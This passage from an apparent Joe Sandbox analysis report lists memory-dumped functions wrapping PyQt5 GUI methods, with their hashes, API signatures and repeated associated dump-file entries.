                                                                                                                                                                                                                                          • API ID: ?clone@Document@@Object@@@Text
                                                                                                                                                                                                                                          • String ID: B|JH$QTextDocument$clone$clone(self, parent: Optional[QObject] = None) -> Optional[QTextDocument]
                                                                                                                                                                                                                                          • API String ID: 2699143496-4069445577
                                                                                                                                                                                                                                          • Opcode ID: 11e17d2cf28965bedf2b13cc735984bd1c51420fe902dc97c7da170f97425b84
                                                                                                                                                                                                                                          • Instruction ID: 5ffa39e7dc248c2f4b372be297510b12d3855731d90e0fe567a29872eefb5de0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11e17d2cf28965bedf2b13cc735984bd1c51420fe902dc97c7da170f97425b84
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE21B737619B46C5DB608B51E8893AD33A8FB48BD0F924136DA9E43320EF39E559C744
                                                                                                                                                                                                                                          Function 00007FF89D9A9F20 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?setFlags@QStandardItem@@QEAAXV?$QFlags@W4ItemFlag@Qt@@@@@Z.QT5GUI ref: 00007FF89D9A9F92
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Flags@$?setFlag@ItemItem@@Qt@@@@@Standard
                                                                                                                                                                                                                                          • String ID: BJ1$QStandardItem$setFlags$setFlags(self, flags: Union[Qt.ItemFlags, Qt.ItemFlag])
                                                                                                                                                                                                                                          • API String ID: 3966485804-1712263351
                                                                                                                                                                                                                                          • Opcode ID: f1c422fbad20d407f2e68926aea871673d66c311d75662946f4386e966b69fe6
                                                                                                                                                                                                                                          • Instruction ID: 83357625825cc8e8f1f1599f5fa9645df154cbbbf4cd5ce88c1c69ba04f3cb19
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1c422fbad20d407f2e68926aea871673d66c311d75662946f4386e966b69fe6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2521D87BA08F46C5DB608F11E8891A933B4FB48BD0F918132DA9E43320EF39E559C744
                                                                                                                                                                                                                                          Function 00007FF89D9B5AA0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setPainter@@Transform@Transform@@_
                                                                                                                                                                                                                                          • String ID: BJ9|b$QPainter$setTransform$setTransform(self, transform: QTransform, combine: bool = False)
                                                                                                                                                                                                                                          • API String ID: 2953993439-4023963478
                                                                                                                                                                                                                                          • Opcode ID: 4aeddda5b54f188656e3daeefffd09b829c4a8759e06c9daa45ac8ab07897aec
                                                                                                                                                                                                                                          • Instruction ID: a47d389aa60a213050011cb356035e8b08d5135c29faba37e9e9741a21248852
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4aeddda5b54f188656e3daeefffd09b829c4a8759e06c9daa45ac8ab07897aec
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F121F537A18F46D5DB208F11E8892AD33A8FB48B80F814136DAEE43720EF39E559C704
                                                                                                                                                                                                                                          Function 00007FF89D983A20 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setString@@@Title@Writer@@
                                                                                                                                                                                                                                          • String ID: BJ1$QPdfWriter$setTitle$setTitle(self, title: Optional[str])
                                                                                                                                                                                                                                          • API String ID: 132041274-519051081
                                                                                                                                                                                                                                          • Opcode ID: d1a8c67e67a322c693d361418a96b7c458eee244eabac1ed4d61b2d9482a115a
                                                                                                                                                                                                                                          • Instruction ID: d72d0b7c3fcf4fddb6ca7f61f536f5cfbf1ae070b46fe419d39f45c597f9c296
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1a8c67e67a322c693d361418a96b7c458eee244eabac1ed4d61b2d9482a115a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A821E277A08B46C1EB209F11E8891A933B4FB48FD0F918032DA9E43320EF39E559C744
                                                                                                                                                                                                                                          Function 00007FF89D951E70 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?setDefaultStyleSheet@QTextDocument@@QEAAXAEBVQString@@@Z.QT5GUI ref: 00007FF89D951EE0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setDefaultDocument@@Sheet@String@@@StyleText
                                                                                                                                                                                                                                          • String ID: BJ1$QTextDocument$setDefaultStyleSheet$setDefaultStyleSheet(self, sheet: Optional[str])
                                                                                                                                                                                                                                          • API String ID: 195671152-2482487334
                                                                                                                                                                                                                                          • Opcode ID: c0bbd7261d9cee5ba99ae8842324851fe02488f73ef6de365d46ebdafd3f23a4
                                                                                                                                                                                                                                          • Instruction ID: 0e2d5c5ed2d8ba8547cafb9b9ae3f131944356f403dde82ac973952894a25693
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0bbd7261d9cee5ba99ae8842324851fe02488f73ef6de365d46ebdafd3f23a4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9421D377A08B46C1DB209B11E8891A933B4FB48FD4F918132DA9E83324EF39E959C744
                                                                                                                                                                                                                                          Function 00007FF89D9BBDA0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?setFileName@QTextDocumentWriter@@QEAAXAEBVQString@@@Z.QT5GUI ref: 00007FF89D9BBE10
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setDocumentFileName@String@@@TextWriter@@
                                                                                                                                                                                                                                          • String ID: BJ1$QTextDocumentWriter$setFileName$setFileName(self, fileName: Optional[str])
                                                                                                                                                                                                                                          • API String ID: 2944042713-309164994
                                                                                                                                                                                                                                          • Opcode ID: 360a31061a679e31dabe65e83e5b0c21e46960bf7946d696291812f91882b832
                                                                                                                                                                                                                                          • Instruction ID: 77c33991e767fc3e789ec1ae614b3ac4019737f528fe919454fef1c8ddf92d5c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 360a31061a679e31dabe65e83e5b0c21e46960bf7946d696291812f91882b832
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE21E437A08B46C1EB209F11E8891A933B4FB48BD0F918136DA9E43320EF39E559C744
                                                                                                                                                                                                                                          Function 00007FF89D9840E0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?setTabPositions@QTextBlockFormat@@QEAAXAEBV?$QList@UTab@QTextOption@@@@@Z.QT5GUI ref: 00007FF89D984150
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?setBlockFormat@@List@Option@@@@@Positions@Tab@
                                                                                                                                                                                                                                          • String ID: BJ1$QTextBlockFormat$setTabPositions$setTabPositions(self, tabs: Iterable[QTextOption.Tab])
                                                                                                                                                                                                                                          • API String ID: 1867678782-4275327497
                                                                                                                                                                                                                                          • Opcode ID: ab88a1f85d5792652e1f4167fdd797751f62c4712c0526eca19363bf94b55efe
                                                                                                                                                                                                                                          • Instruction ID: ef3001b503a65d15b256785e51da996d6ddbaf0f6d8cd0398f211aa5a1b00114
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab88a1f85d5792652e1f4167fdd797751f62c4712c0526eca19363bf94b55efe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D421D377A08B46D5DB208F15E8891A933B4FB48FD0F918132CA9E43320EF79E559C744
                                                                                                                                                                                                                                          Function 00007FF89D958020 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?setItemRoleNames@QStandardItemModel@@QEAAXAEBV?$QHash@HVQByteArray@@@@@Z.QT5GUI ref: 00007FF89D958090
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Item$?setArray@@@@@ByteHash@Model@@Names@RoleStandard
                                                                                                                                                                                                                                          • String ID: BJ1$QStandardItemModel$setItemRoleNames$setItemRoleNames(self, roleNames: Dict[int, Union[QByteArray, bytes, bytearray]])
                                                                                                                                                                                                                                          • API String ID: 2491482276-4106150772
                                                                                                                                                                                                                                          • Opcode ID: 703bc744ed5c9f9db21ff94e38b7d10b2beecbe91f1ac68c644e2ca6df6e29b7
                                                                                                                                                                                                                                          • Instruction ID: 4a2c3a0ec3b0918c75731eaa226758a5c925134a1df93a0d993f7c26059395ed
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 703bc744ed5c9f9db21ff94e38b7d10b2beecbe91f1ac68c644e2ca6df6e29b7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B21E477A08F46D1DB208F11E8895AA73B8FB48BD0F918132DA9E43320EF39E559C744
                                                                                                                                                                                                                                          Function 00007FF89D966010 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?setBorderBrush@QTextTableCellFormat@@QEAAXAEBVQBrush@@@Z.QT5GUI ref: 00007FF89D966080
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
